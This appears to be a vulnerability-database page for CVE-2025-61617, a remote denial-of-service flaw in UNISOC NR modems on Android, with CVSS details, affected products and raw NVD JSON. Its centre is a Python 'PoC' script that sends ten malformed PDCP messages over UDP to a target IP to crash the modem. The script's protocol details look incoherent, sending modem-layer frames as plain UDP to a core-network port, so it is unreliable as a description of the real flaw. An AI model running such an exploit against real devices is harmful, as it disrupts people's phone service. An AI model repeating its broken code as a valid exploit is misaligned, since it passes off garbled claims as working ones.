Security Vulnerability Report
CVE-2025-61617 CVSS 7.5 HIGH

CVE-2025-61617

Published: 2025-12-01 08:15:49
Last Modified: 2025-12-02 15:53:53

Description

In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE
UNISOC NR Modem (version unknown - the vendor has not yet published a list of affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61617 PoC - UNISOC NR Modem Denial of Service
# This PoC demonstrates sending malformed NR protocol messages to trigger the vulnerability
import socket
import struct
import random


def create_malformed_nr_message():
    """
    Create a malformed NR PDCP message with invalid IE values
    to trigger input validation vulnerability in UNISOC NR modem
    """
    # NR PDCP Control Plane message header
    msg_type = 0x02  # PDCP Control PDU

    # Malformed PDCP SN (Sequence Number) - out of bounds value
    pdcp_sn = 0xFFFF  # Invalid SN value causing validation bypass

    # Create message with oversized PDCP SDU length field
    pdu_length = 0x10000  # Oversized length causing buffer overflow

    # Construct malformed PDCP PDU
    header = struct.pack('!BBH',
        0x00,  # D/C field
        msg_type,
        pdcp_sn
    )

    # Add malformed length field
    length_field = struct.pack('!I', pdu_length)

    # Add crafted payload with invalid values
    payload = b'\x00' * 256 + struct.pack('!Q', 0xFFFFFFFFFFFFFFFF)

    malformed_msg = header + length_field + payload
    return malformed_msg


def send_dos_exploit(target_ip, port=38412):
    """
    Send malformed NR protocol message to trigger DoS
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        # Create multiple malformed messages
        for i in range(10):
            msg = create_malformed_nr_message()
            sock.sendto(msg, (target_ip, port))
            print(f"[*] Sent malformed message {i+1}/10")

        sock.close()
        print("[+] Exploit sent successfully - Target modem should crash")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    # Target configuration
    target_ip = "<target_device_ip>"
    target_port = 38412

    print("[*] CVE-2025-61617 PoC - UNISOC NR Modem Input Validation DoS")
    print("[*] Target: " + target_ip)
    send_dos_exploit(target_ip, target_port)

References

https://www.unisoc.com/en/support/announcement/1995394837938163714 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61617", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:48.740", "lastModified": "2025-12-02T15:53:53.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, existe una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría conducir a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}